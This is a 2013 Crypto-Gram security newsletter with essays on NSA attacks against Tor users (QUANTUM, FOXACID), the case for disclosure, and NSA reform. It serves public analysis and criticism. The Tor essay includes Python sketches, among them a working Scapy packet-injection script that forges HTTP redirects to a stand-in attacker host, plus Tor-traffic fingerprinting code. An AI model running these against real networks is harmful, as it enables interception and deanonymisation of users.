Crypto-Gram

October 15, 2013

by Bruce Schneier
BT Security Futurologist
schneier@schneier.com
http://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit <http://www.schneier.com/crypto-gram.html>.

You can read this issue on the web at <http://www.schneier.com/crypto-gram-1310.html>. These same essays and news items appear in the “Schneier on Security” blog at <http://www.schneier.com/>, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:
      How the NSA Attacks Tor/Firefox Users With QUANTUM and FOXACID
      Why It's Important to Publish the NSA Programs
      The NSA's New Risk Analysis
      Reforming the NSA
      NSA/Snowden News
      The Limitations of Intelligence
      Metadata Equals Surveillance
      Senator Feinstein Admits the NSA Taps the Internet Backbone
      NSA Storing Internet Data, Social Networking Data, on Pretty Much Everybody
      News
      Air Gaps
      Will Keccak = SHA-3?
      Schneier News
      Google Knows Every Wi-Fi Password in the World
      Surreptitiously Tampering with Computer Chips

How the NSA Attacks Tor/Firefox Users With QUANTUM and FOXACID

The online anonymity network Tor is a high-priority target for the National Security Agency. The work of attacking Tor is done by the NSA’s application vulnerabilities branch, which is part of the systems intelligence directorate, or SID. The majority of NSA employees work in SID, which is tasked with collecting data from communications systems around the world.

According to a top-secret NSA presentation provided by the whistleblower Edward Snowden, one successful technique the NSA has developed involves exploiting the Tor browser bundle, a collection of programs designed to make it easy for people to install and use the software. The trick identifies Tor users on the Internet and then executes an attack against their Firefox web browser.

The NSA refers to these capabilities as CNE, or computer network exploitation.

The first step of this process is finding Tor users. To accomplish this, the NSA relies on its vast capability to monitor large parts of the Internet. This is done via the agency’s partnership with US telecoms firms under programs codenamed Stormbrew, Fairview, Oakstar and Blarney.

The NSA creates “fingerprints” that detect HTTP requests from the Tor network to particular servers. These fingerprints are loaded into NSA database systems like XKeyscore, a bespoke collection and analysis tool that NSA boasts allows its analysts to see “almost everything” a target does on the Internet.

Using powerful data analysis tools with codenames such as Turbulence, Turmoil and Tumult, the NSA automatically sifts through the enormous amount of Internet traffic that it sees, looking for Tor connections.
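
Spotting the Tor connections themselves is the easy half of that pipeline, because the list of Tor relays is public. Here is a minimal sketch, in Python, of what relay-based traffic matching might look like. The flow-record format and the relays.txt file are stand-ins invented for illustration; none of this comes from the NSA documents:

    # Hypothetical sketch: flag network flows whose destination is a
    # known Tor relay. The Tor consensus (the list of relay addresses)
    # is public, so any observer with backbone access could build
    # this list.

    def load_relay_ips(path="relays.txt"):
        # One relay IP per line, assumed pre-fetched from the
        # public Tor consensus.
        with open(path) as f:
            return {line.strip() for line in f if line.strip()}

    def tor_clients(flow_records, relay_ips):
        # flow_records: iterable of (src_ip, dst_ip, dst_port)
        # tuples, a stand-in for whatever a real collection
        # system emits.
        for src, dst, port in flow_records:
            if dst in relay_ips:
                yield src  # this client is connecting into Tor

    relays = load_relay_ips()
    flows = [("198.51.100.7", "203.0.113.1", 9001)]
    for client in tor_clients(flows, relays):
        print("Tor user candidate:", client)

Note what this gives the observer and what it doesn't: it identifies that someone is using Tor, not who they are or what they are doing inside it, which is exactly the distinction drawn below.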

Last month, Brazilian TV news show Fantastico showed screenshots of an NSA tool that had the ability to identify Tor users by monitoring Internet traffic.

The very feature that makes Tor a powerful anonymity service, the fact that all Tor users look alike on the Internet, also makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.

After identifying an individual Tor user on the Internet, the NSA uses its network of secret Internet servers to redirect that user to another set of secret Internet servers, codenamed FOXACID, to infect the user’s computer. FOXACID is an NSA system designed to act as a matchmaker between potential targets and attacks developed by the NSA, giving the agency the opportunity to launch prepared attacks against their systems.

Once the computer is successfully attacked, it secretly calls back to a FOXACID server, which then performs additional attacks on the target computer to ensure that it remains compromised long-term, and continues to provide eavesdropping information back to the NSA.

Exploiting the Tor browser bundle

Tor is a well-designed and robust anonymity tool, and successfully attacking it is difficult. The NSA attacks we found individually target Tor users by exploiting vulnerabilities in their Firefox browsers, and not the Tor application directly.

This, too, is difficult. Tor users often turn off vulnerable services like scripts and Flash when using Tor, making it difficult to target those services. Even so, the NSA uses a series of native Firefox vulnerabilities to attack users of the Tor browser bundle.

According to the training presentation provided by Snowden, EGOTISTICALGIRAFFE exploits a type confusion vulnerability in E4X, an XML extension for JavaScript. The vulnerability exists in Firefox versions 11.0 through 16.0.2, as well as in Firefox 10.0 ESR, the version used until recently in the Tor browser bundle. According to another document, the vulnerability exploited by EGOTISTICALGIRAFFE was inadvertently fixed when Mozilla removed the E4X library containing the vulnerability and Tor moved the browser bundle to a newer Firefox version, but the NSA was confident that it would be able to find a replacement exploit that worked against version 17.0 ESR.

The Quantum system

To trick targets into visiting a FOXACID server, the NSA relies on its secret partnerships with US telecoms companies. As part of the Turmoil system, the NSA places secret servers, codenamed Quantum, at key places on the Internet backbone. This placement ensures that they can respond faster than the legitimate websites can. By exploiting that speed difference, these servers can impersonate a visited website to the target before the real site can respond, thereby tricking the target’s browser into visiting a FOXACID server.

In the academic literature, these are called “man-in-the-middle” attacks, and they have long been known to the commercial and academic security communities. More specifically, they are examples of “man-on-the-side” attacks.

They are hard for any organization other than the NSA to reliably execute, because they require the attacker to have a privileged position on the Internet backbone, and exploit a “race condition” between the NSA server and the legitimate website. A top-secret NSA diagram, made public last month, shows a Quantum server impersonating Google in this type of attack.

The NSA uses these fast Quantum servers to execute a packet injection attack, which surreptitiously redirects the target to the FOXACID server. An article in the German magazine Spiegel, based on additional top-secret Snowden documents, mentions an NSA-developed attack technology called QUANTUMINSERT that performs redirection attacks. Another top-secret Tor presentation provided by Snowden mentions QuantumCookie to force cookies onto target browsers, and another Quantum program to “degrade/deny/disrupt Tor access”.
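
To make the mechanics concrete, here is a minimal man-on-the-side sketch using the Scapy packet library: watch for an HTTP request, then race the legitimate server with a forged redirect. This is my illustration of the generic technique, not code from any document; the redirect target is a made-up placeholder, and actually winning the race requires the privileged backbone position described above:

    # Conceptual man-on-the-side sketch using Scapy. The attacker
    # sees a client's HTTP request and answers with a forged 302
    # redirect before the legitimate server can.
    from scapy.all import IP, TCP, Raw, send, sniff

    # Made-up placeholder for the attack server's address.
    REDIRECT = b"HTTP/1.1 302 Found\r\nLocation: http://attacker.example/\r\n\r\n"

    def inject(pkt):
        if pkt.haslayer(Raw) and pkt[Raw].load.startswith(b"GET "):
            glen = len(pkt[Raw].load)
            forged = (
                IP(src=pkt[IP].dst, dst=pkt[IP].src)
                / TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport,
                      flags="PA",
                      seq=pkt[TCP].ack,         # continue the server's byte stream
                      ack=pkt[TCP].seq + glen)  # acknowledge the client's GET
                / Raw(load=REDIRECT)
            )
            send(forged, verbose=False)  # must arrive before the real reply

    sniff(filter="tcp port 80", prn=inject)  # requires root privileges

The client’s browser accepts whichever well-formed answer arrives first, which is why raw speed, not cryptographic cleverness, is the whole game.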

This same technique is used by the Chinese government to block its citizens from reading censored Internet content, and has been hypothesized as a probable NSA attack technique.

The FOXACID system

According to various top-secret documents provided by Snowden, FOXACID is the NSA codename for what the NSA calls an “exploit orchestrator,” an Internet-enabled system capable of attacking target computers in a variety of different ways. It is a Windows 2003 computer configured with custom software and a series of Perl scripts. These servers are run by the NSA’s tailored access operations, or TAO, group. TAO is another subgroup of the systems intelligence directorate.

The servers are on the public Internet. They have normal-looking domain names, and can be visited by any browser from anywhere; ownership of those domains cannot be traced back to the NSA.

However, if a browser tries to visit a FOXACID server with a special URL, called a FOXACID tag, the server attempts to infect that browser, and then the computer, in an effort to take control of it. The NSA can trick browsers into using that URL using a variety of methods, including the race-condition attack mentioned above and frame injection attacks.

FOXACID tags are designed to look innocuous, so that anyone who sees them would not be suspicious. http://baseball2.2ndhalfplays.com/nested/attribs/… is an example of one such tag, given in another top-secret training presentation provided by Snowden.

There was no registered domain name by that name; it was just an example for internal NSA training purposes.

The training material states that merely trying to visit the homepage of a real FOXACID server will not result in any attack, and that a specialized URL is required. This URL would be created by TAO for a specific NSA operation, and unique to that operation and target. This allows the FOXACID server to know exactly who the target is when his computer contacts it.
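
The documents don’t say how these one-time URLs are constructed, but the idea is easy to model. A hypothetical sketch in Python, with every name invented: embed an unguessable per-operation token in the URL, and have the server map the token back to the operation and target:

    # Hypothetical sketch of per-target tagged URLs (not from the
    # Snowden documents): each operation gets a random token, and
    # the server maps the token back to the operation and target.
    import secrets

    operations = {}  # token -> (operation, target)

    def make_tag(operation, target, host="innocuous.example.com"):
        token = secrets.token_urlsafe(16)  # unguessable, single-use
        operations[token] = (operation, target)
        return "http://%s/%s" % (host, token)

    def identify(url):
        token = url.rsplit("/", 1)[-1]
        return operations.get(token)  # None for casual visitors

    tag = make_tag("OP-EXAMPLE", "target-123")
    print(tag, "->", identify(tag))

A casual visitor who types in the bare domain gets nothing, which matches the training material’s claim that visiting the homepage triggers no attack.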

According to Snowden, FOXACID is a general CNE system, used for many types of attacks other than the Tor attacks described here. It is designed to be modular, with flexibility that allows TAO to swap and replace exploits if they are discovered, and only run certain exploits against certain types of targets.

The most valuable exploits are saved for the most important targets. Low-value exploits are run against technically sophisticated targets where the chance of detection is high. TAO maintains a library of exploits, each based on a different vulnerability in a system. Different exploits are authorized against different targets, depending on the value of the target, the target’s technical sophistication, the value of the exploit, and other considerations.
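
The documents describe this as a judgment call, not a formula, but the shape of the decision logic is clear enough to sketch. A toy Python version, with the tiers and thresholds invented for illustration:

    # Toy model of exploit tiering; the real authorization rules are
    # not public. Valuable zero-days are reserved for high-value
    # targets unlikely to detect them.
    def choose_exploit(target_value, target_sophistication):
        # Both inputs on an invented 0-10 scale.
        if target_sophistication >= 7:
            # High detection risk: don't burn anything valuable.
            return "already-known vulnerability"
        if target_value >= 8:
            return "rare zero-day"
        if target_value >= 5:
            return "mid-tier exploit"
        return "low-value exploit"

    print(choose_exploit(9, 2))  # -> rare zero-day
    print(choose_exploit(4, 8))  # -> already-known vulnerability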

In the case of Tor users, FOXACID might use EGOTISTICALGIRAFFE against their Firefox browsers.

According to a top-secret operational management procedures manual provided by Snowden, once a target is successfully exploited, it is infected with one of several payloads. Two basic payloads mentioned in the manual are designed to collect configuration and location information from the target computer so an analyst can determine how to further infect the computer.

These decisions are based in part on the technical sophistication of the target and on the security software installed on the target computer, referred to in the manual as Personal Security Products, or PSPs.

FOXACID payloads are updated regularly by TAO. For example, the manual refers to version 8.2.1.1 of one of them.

FOXACID servers also have sophisticated capabilities to avoid detection and to ensure successful infection of their targets. The operations manual states that a FOXACID payload with the codename DireScallop can circumvent commercial products that prevent malicious software from making changes to a system that survive a reboot.

The NSA also uses phishing attacks to induce users to click on FOXACID tags.

TAO additionally uses FOXACID to handle callbacks: the general term for a computer, infected by some automatic means, calling back to the NSA for more instructions and possibly to upload data from the target computer.

According to a top-secret operational management procedures manual, FOXACID servers configured to receive callbacks are codenamed FrugalShot. After a callback, the FOXACID server may run more exploits to ensure that the target computer remains compromised long term, as well as install “implants” designed to exfiltrate data.

By 2008, the NSA was getting so much FOXACID callback data that they needed to build a special system to manage it all.

This essay previously appeared in the Guardian.
http://www.theguardian.com/world/2013/oct/04/…
It is the technical article associated with this more general-interest article.
http://www.theguardian.com/world/2013/oct/04/…

The URL in the essay (now redacted at the Guardian site) was registered within minutes of the story posting, and is being used to serve malware. Don’t click on it.

The Guardian version of this story got the capitalization wrong. NSA code names should be in all caps. It’s QUANTUMINSERT and FOXACID, even if the news media doesn’t like it. The NSA really should release a style guide for press organizations publishing their secrets.

XKeyscore:
http://www.theguardian.com/world/2013/jul/31/…

Screenshots from the Brazilian news story:
http://www.slate.com/blogs/future_tense/2013/09/09/…

A man-in-the-middle attack against Google:
https://www.documentcloud.org/documents/…

NSA diagram:
https://www.documentcloud.org/documents/…

Spiegel article:
http://www.spiegel.de/international/europe/…

Speculative essay on how the NSA could use packet injection:
https://medium.com/surveillance-state/1b5ab05ac74e

Source material:
http://www.theguardian.com/world/interactive/2013/…
http://www.theguardian.com/world/interactive/2013/…
http://www.theguardian.com/world/interactive/2013/…

Related Washington Post story:
http://www.washingtonpost.com/world/…
http://apps.washingtonpost.com/g/page/world/…

Director of National Intelligence response:
http://icontherecord.tumblr.com/post/63103784923/…

GCHQ article:
http://www.spiegel.de/international/europe/…


Why It’s Important to Publish the NSA Programs

The Guardian recently reported on how the NSA targets Tor users, along with details of how it uses centrally placed servers on the Internet to attack individual computers. This builds on a Brazilian news story from mid-September that, in part, shows that the NSA is impersonating Google servers to users; a German story on how the NSA is hacking into smartphones; and a Guardian story from early September on how the NSA is deliberately weakening common security algorithms, protocols, and products.

The common thread among these stories is that the NSA is subverting the Internet and turning it into a massive surveillance tool. The NSA’s actions are making us all less safe, because its eavesdropping mission is degrading its ability to protect the US.

Among IT security professionals, it has long been understood that the public disclosure of vulnerabilities is the only consistent way to improve security. That’s why researchers publish information about vulnerabilities in computer software and operating systems, cryptographic algorithms, and consumer products like implantable medical devices, cars, and CCTV cameras.

It wasn’t always like this. In the early years of computing, it was common for security researchers to quietly alert the product vendors about vulnerabilities, so they could fix them without the “bad guys” learning about them. The problem was that the vendors wouldn’t bother fixing them, or took years before getting around to it. Without public pressure, there was no rush.

This all changed when researchers started publishing. Now vendors are under intense public pressure to patch vulnerabilities as quickly as possible. The majority of security improvements in the hardware and software we all use today are a result of this process. This is why Microsoft’s Patch Tuesday process fixes so many vulnerabilities every month. This is why Apple’s iPhone is designed so securely. This is why so many products push out security updates so often. And this is why mass-market cryptography has continually improved. Without public disclosure, you’d be much less secure against cybercriminals, hacktivists, and state-sponsored cyberattackers.

The NSA’s actions turn that process on its head, which is why the security community is so incensed. The NSA not only develops and purchases vulnerabilities, but deliberately creates them through secret vendor agreements. These actions go against everything we know about improving security on the Internet.

It’s folly to believe that any NSA hacking technique will remain secret for very long. Yes, the NSA has a bigger research effort than any other institution, but there’s a lot of research being done—by other governments in secret, and in academic and hacker communities in the open. These same attacks are being used by other governments. And technology is fundamentally democratizing: today’s NSA secret techniques are tomorrow’s PhD theses and the following day’s cybercrime attack tools.

It’s equal folly to believe that the NSA’s secretly installed backdoors will remain secret. Given how inept the NSA was at protecting its own secrets, it’s extremely unlikely that Edward Snowden was the first sysadmin contractor to walk out the door with a boatload of them. And the previous leakers could have easily been working for a foreign government. But it wouldn’t take a rogue NSA employee; researchers or hackers could discover any of these backdoors on their own.

This isn’t hypothetical. We already know of government-mandated backdoors being used by criminals in Greece, Italy, and elsewhere. We know China is actively engaging in cyber-espionage worldwide. A recent Economist article called it “akin to a government secretly commanding lockmakers to make their products easier to pick—and to do so amid an epidemic of burglary.”

The NSA has two conflicting missions. Its eavesdropping mission has been getting all the headlines, but it also has a mission to protect US military and critical infrastructure communications from foreign attack. Historically, these two missions have not come into conflict. During the Cold War, for example, we would defend our systems and attack Soviet systems.

But with the rise of mass-market computing and the Internet, the two missions have become interwoven. It becomes increasingly difficult to attack their systems and defend our systems, because everything is using the same systems: Microsoft Windows, Cisco routers, HTML, TCP/IP, iPhones, Intel chips, and so on. Finding a vulnerability—or creating one—and keeping it secret to attack the bad guys necessarily leaves the good guys more vulnerable.

Far better would be for the NSA to take those vulnerabilities back to the vendors to patch. Yes, it would make it harder to eavesdrop on the bad guys, but it would make everyone on the Internet safer. If we believe in protecting our critical infrastructure from foreign attack, if we believe in protecting Internet users from repressive regimes worldwide, and if we believe in defending businesses and ourselves from cybercrime, then doing otherwise is lunacy.

It is important that we make the NSA’s actions public in sufficient detail for the vulnerabilities to be fixed. It’s the only way to force change and improve security.

This essay previously appeared in the Guardian.
http://www.theguardian.com/commentisfree/2013/oct/…

News stories:
https://www.schneier.com/blog/archives/2013/09/…
http://www.spiegel.de/international/world/…
http://www.theguardian.com/world/2013/sep/05/…

The NSA is subverting the Internet:
http://www.theguardian.com/commentisfree/2013/sep/…
http://www.theguardian.com/commentisfree/2013/sep/…

Government backdoors used by others:
https://www.schneier.com/essay-428.html

Economist article:
http://www.economist.com/news/international/…

The NSA’s two missions:
https://www.schneier.com/blog/archives/2008/05/…


The NSA’s New Risk Analysis

As I recently reported in the Guardian, the NSA has secret servers on the Internet that hack into other computers, codenamed FOXACID. These servers provide an excellent demonstration of how the NSA approaches risk management, and expose flaws in how the agency thinks about the secrecy of its own programs.

Here are the FOXACID basics: By the time the NSA tricks a target into visiting one of those servers, it already knows exactly who that target is, who wants him eavesdropped on, and the expected value of the data it hopes to receive. Based on that information, the server can automatically decide what exploit to serve the target, taking into account the risks associated with attacking the target, as well as the benefits of a successful attack. According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head—all delivered from a FOXACID subsystem called Ferret Cannon. Oh how I love some of these code names. (On the other hand, EGOTISTICALGIRAFFE has to be the dumbest code name ever.)

Snowden explained this to Guardian reporter Glenn Greenwald in Hong Kong. If the target is a high-value one, FOXACID might run a rare zero-day exploit that it developed or purchased. If the target is technically sophisticated, FOXACID might decide that there’s too much chance for discovery, and keeping the zero-day exploit a secret is more important. If the target is a low-value one, FOXACID might run an exploit that’s less valuable. If the target is low-value and technically sophisticated, FOXACID might even run an already-known vulnerability.

We know that the NSA receives advance warning from Microsoft of vulnerabilities that will soon be patched; there’s not much of a loss if an exploit based on that vulnerability is discovered. FOXACID has tiers of exploits it can run, and uses a complicated trade-off system to determine which one to run against any particular target.

This cost-benefit analysis doesn’t end at successful exploitation. According to Snowden, the TAO—that’s Tailored Access Operations—operators running the FOXACID system have a detailed flowchart, with tons of rules about when to stop. If something doesn’t work, stop. If they detect a PSP, a personal security product, stop. If anything goes weird, stop. This is how the NSA avoids detection, and also how it takes mid-level computer operators and turns them into what they call “cyberwarriors.” It’s not that they’re skilled hackers; it’s that the procedures do the work for them.

And they’re super cautious about what they do.

While the NSA excels at performing this cost-benefit analysis at the tactical level, it’s far less competent at doing the same thing at the policy level. The organization seems to be good enough at assessing the risk of discovery—for example, the risk that the target of an intelligence-gathering effort discovers that effort—but seems to have completely ignored the risk of those efforts becoming front-page news.

It’s not just in the U.S., where newspapers are heavy with reports of the NSA spying on every Verizon customer, spying on domestic e-mail users, and secretly working to cripple commercial cryptography systems, but also around the world, most notably in Brazil, Belgium, and the European Union. All of these operations have caused significant blowback—for the NSA, for the U.S., and for the Internet as a whole.

The NSA spent decades operating in almost complete secrecy, but those days are over. As the corporate world learned years ago, secrets are hard to keep in the information age, and openness is a safer strategy. The tendency to classify everything means that the NSA won’t be able to sort what really needs to remain secret from everything else. The younger generation is more used to radical transparency than secrecy, and is less invested in the national security state. And whistleblowing is the civil disobedience of our time.

At this point, the NSA has to assume that all of its operations will become public, probably sooner than it would like. It has to start taking that into account when weighing the costs and benefits of those operations. And it now has to be just as cautious about new eavesdropping operations as it is about using FOXACID exploits against users.

This essay previously appeared in the Atlantic.
http://www.theatlantic.com/technology/archive/2013/…

NSA purchasing zero-day exploits:
http://www.zdnet.com/…

NSA getting advance warning from Microsoft:
http://www.bloomberg.com/news/2013-06-14/…

TAO:
http://www.foreignpolicy.com/articles/2013/06/10/…

NSA abuses:
http://www.theguardian.com/world/2013/jun/06/…
http://www.theguardian.com/world/2013/jun/06/…
http://www.theguardian.com/world/2013/sep/05/…
http://www.cbsnews.com/8301-202_162-57600928/…
http://www.spiegel.de/international/europe/…
http://www.spiegel.de/international/world/…

Secrets are hard to keep:
http://www.reuters.com/article/2010/11/28/…
http://www.npr.org/templates/story/story.php?…

On openness as a strategy:
http://blog.ted.com/2013/01/24/…

Overclassification:
http://www.nytimes.com/2013/08/04/sunday-review/…

Generational issues in secrecy:
https://www.schneier.com/essay-449.html

Whistleblowing as civil disobedience:
http://www.zephoria.org/thoughts/archives/2013/07/…


Reforming the NSA

Leaks from the whistleblower Edward Snowden have catapulted the NSA into newspaper headlines and demonstrated that it has become one of the most powerful government agencies in the country. From the secret court rulings that allow it to collect data on all Americans to its systematic subversion of the entire Internet as a surveillance platform, the NSA has amassed an enormous amount of power.

There are two basic schools of thought about how this came to pass. The first focuses on the agency’s power. Like J. Edgar Hoover, NSA Director Keith Alexander has become so powerful as to be above the law. He is able to get away with what he does because neither political party—and nowhere near enough individual lawmakers—dare cross him. Longtime NSA watcher James Bamford recently quoted a CIA official: “We jokingly referred to him as Emperor Alexander—with good cause, because whatever Keith wants, Keith gets.”

Possibly the best evidence for this position is how well Alexander has weathered the Snowden leaks. The NSA’s most intimate secrets are front-page headlines, week after week. Morale at the agency is in shambles. Revelation after revelation has demonstrated that Alexander has exceeded his authority, deceived Congress, and possibly broken the law. Tens of thousands of additional top-secret documents are still to come. Alexander has admitted that he still doesn’t know what Snowden took with him and wouldn’t have known about the leak at all had Snowden not gone public. He has no idea who else might have stolen secrets before Snowden, or whom such insiders might have provided them to. Alexander had no contingency plans in place to deal with this sort of security breach, and even now—four months after Snowden fled the country—still has no coherent response to all this.

For an organization that prides itself on secrecy and security, this is what failure looks like. It is a testament to Alexander’s power that he still has a job.

The second school of thought is that it’s the administration’s fault—not just the present one, but the most recent several. According to this theory, the NSA is simply doing its job. If there’s a problem with the NSA’s actions, it’s because the rules it’s operating under are bad. Like the military, the NSA is merely an instrument of national policy. Blaming the NSA for creating a surveillance state is comparable to blaming the US military for the conduct of the Iraq war. Alexander is performing the mission given to him as best he can, under the rules he has been given, with the sort of zeal you’d expect from someone promoted into that position. And the NSA’s power predated his directorship.

Former NSA Director Michael Hayden exemplifies this in a quote from late July: “Give me the box you will allow me to operate in. I’m going to play to the very edges of that box.”

This doesn’t necessarily mean the administration is deliberately giving the NSA too big a box. More likely, it’s simply that the laws aren’t keeping pace with technology. Every year, technology gives us possibilities that our laws simply don’t cover clearly. And whenever there’s a gray area, the NSA interprets whatever law there is to give itself the most expansive authority. It simply runs rings around the secret court that rules on these things. My guess is that while the NSA has clearly broken the spirit of the law, it’ll be harder to demonstrate that it broke the letter of the law.

In football terms, the first school of thought says the NSA is out of bounds. The second says the field is too big. I believe that both perspectives have some truth to them, and that the real problem comes from their combination.

Regardless of how we got here, the NSA can’t reform itself. Change cannot come from within; it has to come from above. It’s the job of government: of Congress, of the courts, and of the president. These are the people who have the ability to investigate how things became so bad, rein in the rogue agency, and establish new systems of transparency, oversight, and accountability.

Any solution we devise will make the NSA less efficient at its eavesdropping job. That’s a trade-off we should be willing to make, just as we accept reduced police efficiency caused by requiring warrants for searches and warning suspects that they have the right to an attorney before answering police questions. We do this because we realize that a too-powerful police force is itself a danger, and we need to balance our need for public safety with our aversion to a police state.

The same reasoning needs to apply to the NSA. We want it to eavesdrop on our enemies, but it needs to do so in a way that doesn’t trample on the constitutional rights of Americans, or fundamentally jeopardize their privacy or security. This means that sometimes the NSA won’t get to eavesdrop, just as the protections we put in place to restrain police sometimes result in a criminal getting away. This is a trade-off we need to make willingly and openly, because overall we are safer that way.

Once we do this, there needs to be a cultural change within the NSA. Like at the FBI and CIA after past abuses, the NSA needs new leadership committed to changing its culture. And giving up power.

Our society can handle the occasional terrorist act; we’re resilient, and—if we decided to act that way—indomitable. But a government agency that is above the law… it’s hard to see how America and its freedoms can survive that.

This essay previously appeared on TheAtlantic.com, with the unfortunate title of “Zero Sum: Americans Must Sacrifice Some Security to Reform the NSA.” After I complained, they changed the title to “The NSA-Reform Paradox: Stop Domestic Spying, Get More Security.”
http://www.theatlantic.com/politics/archive/2013/09/…

Bamford quote on Alexander:
http://www.wired.com/threatlevel/2013/06/…

NSA morale:
http://articles.latimes.com/2013/aug/24/nation/…

Lack of NSA contingency plans:
http://www.theatlantic.com/national/archive/2013/08/…

Profiles of General Alexander:
http://www.foreignpolicy.com/articles/2013/09/08/…
http://www.wired.com/threatlevel/2013/06/…
http://www.forbes.com/sites/jennifergranick/2013/08/…

Hayden quote:
http://www.charlierose.com/watch/60247615
http://pressthink.org/2013/08/…

Transparency, oversight, and accountability:
http://www.cnn.com/2013/07/31/opinion/…

NSA jeopardizing privacy and security:
https://freedom-to-tinker.com/blog/felten/…
http://online.wsj.com/article/…
http://www.businessweek.com/articles/2013-09-06/…

Indomitable reaction to terrorism:
http://www.theatlantic.com/national/archive/2013/04/…

Is the NSA above the law?
http://www.nytimes.com/2013/06/28/opinion/…


NSA/Snowden News

Tom Tomorrow drew this cartoon during the battle over the Clipper Chip in 1994. It is remarkably prescient.
https://lh3.ggpht.com/-g8kBDvnw7I8/UiyosmPpJfI/…

Yochai Benkler on the NSA:
http://www.theguardian.com/commentisfree/2013/sep/…

Kit Walsh has an interesting blog post where he looks at how existing law can be used to justify the surveillance of Americans.
http://www.dmlp.org/blog/2013/…

The NSA is looking for a Civil Liberties & Privacy Officer. It appears to be an internal posting.
https://www.nsa.gov/psp/applyonline/EMPLOYEE/HRMS/c/…

Kim Zetter has written the definitive story—at least so far—of the possible backdoor in the Dual_EC_DRBG random number generator that’s part of the NIST SP800-90 standard.
http://www.wired.com/threatlevel/2013/09/…

I’ve said that it seems the NSA now has a PR firm advising it on its responses.
https://www.schneier.com/blog/archives/2013/08/…
It’s trying to teach General Alexander how to better respond to questioning.
http://threatpost.com/…

A cute flowchart on how to avoid NSA surveillance:
http://www.dailydot.com/politics/…


The Limitations of Intelligence

We recently learned that US intelligence agencies had at least three days’ warning that Syrian President Bashar al-Assad was preparing to launch a chemical attack on his own people, but weren’t able to stop it. At least that’s what an intelligence briefing from the White House reveals. With the combined abilities of our national intelligence apparatus—the CIA, NSA, National Reconnaissance Office and all the rest—it’s not surprising that we had advance notice. It’s not known whether the US shared what it knew.

More interestingly, the US government did not choose to act on that knowledge (for example, launch a preemptive strike), which left some wondering why.

There are several possible explanations, all of which point to a fundamental problem with intelligence information and our national intelligence apparatuses.

The first possibility is that we may have had the data, but didn’t fully understand what it meant. This is the proverbial connect-the-dots problem. As we’ve learned again and again, connecting the dots is hard. Our intelligence services collect billions of individual pieces of data every day. After the fact, it’s easy to walk backward through the data and notice all the individual pieces that point to what actually happened. Before the fact, though, it’s much more difficult. The overwhelming majority of those bits of data point in random directions, or nowhere at all. Almost all the dots don’t connect to anything.

Rather than thinking of intelligence as a connect-the-dots picture, think of it as a million unnumbered pictures superimposed on top of each other. Which picture is the relevant one? We have no idea. Turning that data into actual information is an extraordinarily difficult problem, and one that the vast scope of our data-gathering programs makes even more difficult.

The second possible explanation is that while we had some information about al-Assad’s plans, we didn’t have enough confirmation to act on that information. This is probably the most likely explanation. We can’t act on inklings, hunches, or possibilities. We probably can’t even act on probabilities; we have to be sure. But when it comes to intelligence, it’s hard to be sure. There could always be something else going on—something we’re not able to eavesdrop on, spy on, or see from our satellites. Again, our knowledge is most obvious after the fact.

The third is that while we were sure of our information, we couldn’t act because that would reveal “sources and methods.” This is probably the most frustrating explanation. Imagine we are able to eavesdrop on al-Assad’s most private conversations with his generals and aides, and are absolutely sure of his plans. If we act on them, we reveal that we are eavesdropping. As a result, he’s likely to change how he communicates, costing us our ability to eavesdrop. It might sound perverse, but often the fact that we are able to successfully spy on someone is a bigger secret than the information we learn from that spying.

This dynamic was vitally important during World War II. During the war, the British were able to break the German Enigma encryption machine and eavesdrop on German military communications. But while the Allies knew a lot, they would only act on information they learned when there was another plausible way they could have learned it. They even occasionally manufactured plausible explanations. It was just too risky to tip the Germans off that their encryption machines’ code had been broken.

The fourth possibility is that there was nothing useful we could have done. And it is hard to imagine how we could have prevented the use of chemical weapons in Syria. We couldn’t have launched a preemptive strike, and it’s probable that it wouldn’t have been effective. The only feasible action would be to alert the opposition—and that, too, might not have accomplished anything. Or perhaps there wasn’t sufficient agreement for any one course of action—so, by default, nothing was done.

All of these explanations point out the limitations of intelligence. The NSA serves as an example. The agency measures its success by the amount of data collected, not by the information synthesized or knowledge gained. But it’s knowledge that matters.

The NSA’s belief that more data is always good, and that it’s worth doing anything in order to collect it, is wrong. There are diminishing returns, and the NSA almost certainly passed that point long ago. But the idea of trade-offs does not seem to be part of its thinking.

The NSA missed the Boston Marathon bombers, even though the suspects left a really sloppy Internet trail and the older brother was on the terrorist watch list. With all the eavesdropping the NSA is doing on the world, you would think the least it could manage would be keeping track of people on the terrorist watch list. Apparently not.

I don’t know how the CIA measures its success, but it failed to predict the end of the Cold War.

More data does not necessarily mean better information. It’s much easier to look backward than to predict. Information does not necessarily enable the government to act. Even when we know something, protecting the methods of collection can be more valuable than the possibility of taking action based on gathered information. But there’s not a lot of value to intelligence that can’t be used for action. These are the paradoxes of intelligence, and it’s time we started remembering them.

Of course, we need organizations like the CIA, the NSA, the NRO and all the rest. Intelligence is a vital component of national security, and can be invaluable in both wartime and peacetime. But it is just one security tool among many, and there are significant costs and limitations.

We’ve just learned from the recently leaked “black budget” that we’re spending $52 billion annually on national intelligence. We need to take a serious look at what kind of value we’re getting for our money, and whether it’s worth it.

This essay previously appeared on CNN.com.
http://www.cnn.com/2013/09/11/opinion/…

Syrian story and commentary:
http://thecable.foreignpolicy.com/posts/2013/08/30/…
http://www.whitehouse.gov/the-press-office/2013/08/…
http://digbysblog.blogspot.com/2013/08/…

Connecting the dots is hard:
https://www.schneier.com/essay-424.html

Our intelligence budget:
http://articles.washingtonpost.com/2013-08-29/world/…


Metadata Equals Surveillance

Back in June, when the contents of Edward Snowden’s cache of NSA documents were just starting to be revealed and we learned about the NSA collecting phone metadata of every American, many people—including President Obama—discounted the seriousness of the NSA’s actions by saying that it’s just metadata.

Lots and lots of people effectively demolished that trivialization, but the arguments are generally subtle and hard to convey quickly and simply. I have a more compact argument: metadata equals surveillance.

Imagine you hired a detective to eavesdrop on someone. He might plant a bug in their office. He might tap their phone. He might open their mail. The result would be the details of that person’s communications. That’s the “data.”

Now imagine you hired that same detective to surveil that person. The result would be details of what he did: where he went, who he talked to, what he looked at, what he purchased—how he spent his day. That’s all metadata.

